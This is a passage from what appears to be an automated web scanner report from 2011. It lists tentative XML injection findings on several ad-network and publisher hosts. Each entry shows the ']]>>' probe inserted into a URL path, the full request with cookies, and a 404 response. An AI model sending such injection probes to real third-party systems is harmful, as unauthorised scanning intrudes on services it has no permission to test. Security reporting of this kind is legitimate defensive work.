<html xmlns="http://www.w
...[SNIP]...
8.3. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://adunit.cdn.auditude.com
Path:   /flash/modules/display/auditudeDisplayLib.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /flash/modules/display]]>>/auditudeDisplayLib.js?callback=ndn.auditudeCallback&width=300&height=225&version=adunit-1.0&domain=auditude.com&zoneId=50912&mediaId=23408962&parentNode=auditudeContent&keyValues=dpid=90009;sitesection=stamford_hom;sec=hom;sub=;wgt=1;width=300;height=225;url=http://www.stamfordadvocate.com/&autoPlay=true&ndnR=4060&countdownMessage=Todays%20Top%20Videos%20available%20in%20{countdown} HTTP/1.1
Host: adunit.cdn.auditude.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/common/toppicks_common1.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom&ZoneID=50912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=0
Cache-Control: must-revalidate
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:28:14 GMT
Expires: Sat, 17 Sep 2011 16:28:14 GMT
Server: EOS (lax002/2868)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.4. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://adunit.cdn.auditude.com
Path:   /flash/modules/display/auditudeDisplayLib.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /flash/modules/display/auditudeDisplayLib.js]]>>?callback=ndn.auditudeCallback&width=300&height=225&version=adunit-1.0&domain=auditude.com&zoneId=50912&mediaId=23408962&parentNode=auditudeContent&keyValues=dpid=90009;sitesection=stamford_hom;sec=hom;sub=;wgt=1;width=300;height=225;url=http://www.stamfordadvocate.com/&autoPlay=true&ndnR=4060&countdownMessage=Todays%20Top%20Videos%20available%20in%20{countdown} HTTP/1.1
Host: adunit.cdn.auditude.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/common/toppicks_common1.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom&ZoneID=50912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=0
Cache-Control: must-revalidate
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:28:22 GMT
Expires: Sat, 17 Sep 2011 16:28:22 GMT
Server: EOS (lax002/54FE)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.5. http://amch.questionmarket.com/adsc/d926534/6/43407814/decide.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d926534/6/43407814/decide.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adsc]]>>/d926534/6/43407814/decide.php?1&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:41:48 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1200


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.6. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d927907/35/43624044/decide.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adsc]]>>/d927907/35/43624044/decide.php?ord=1316296366 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=homepage&tile=1
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0_926534-v"@|M-0; LP=1316270408; ST=913131_; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1_43407799-6-1

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:33:45 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1308


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.7. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen]]>>/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:39:05 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1198


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.8. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/d_layer.php]]>>?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:39:05 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1198


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.9. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen]]>>/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:41:11 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1198


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.10. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/dynamiclink.js.php]]>>?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:41:11 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1198


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.11. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen]]>>/st.php?survey_num=926534&site=67859363&code=43407814&randnum=6483542 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:41:09 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1200


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.12. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adscgen/st.php]]>>?survey_num=926534&site=67859363&code=43407814&randnum=6483542 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:41:09 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1200


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.13. http://amch.questionmarket.com/dt/s/28067/0.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /dt/s/28067/0.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /dt]]>>/s/28067/0.php?rnd=0.8592109645251185 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:38:52 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1198


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.14. http://amch.questionmarket.com/dt/s/28067/0.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /dt/s/28067/0.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /dt/s]]>>/28067/0.php?rnd=0.8592109645251185 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:38:53 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1198


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.15. http://amch.questionmarket.com/dt/s/28067/0.php [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /dt/s/28067/0.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /dt/s/28067]]>>/0.php?rnd=0.8592109645251185 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:38:53 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1198


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.16. http://amch.questionmarket.com/dt/s/28067/0.php [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /dt/s/28067/0.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /dt/s/28067/0.php]]>>?rnd=0.8592109645251185 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:38:54 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1198


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.17. http://amch.questionmarket.com/static/1000_arrow_safecount_li-350x250-1l-eng-usd.swf [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /static/1000_arrow_safecount_li-350x250-1l-eng-usd.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/1000_arrow_safecount_li-350x250-1l-eng-usd.swf?clickTag=JAVASCRIPT:DL_GotoSurvey();&clickTag2=JAVASCRIPT:DL_Close(); HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:39:56 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1198


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.18. http://amch.questionmarket.com/static/1000_arrow_safecount_li-350x250-1l-eng-usd.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /static/1000_arrow_safecount_li-350x250-1l-eng-usd.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/1000_arrow_safecount_li-350x250-1l-eng-usd.swf]]>>?clickTag=JAVASCRIPT:DL_GotoSurvey();&clickTag2=JAVASCRIPT:DL_Close(); HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:39:57 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1198


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
8.19. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hearst.com
Path:   /about-hearst/corporate-george-r-hearst-jr.php

Issue detail

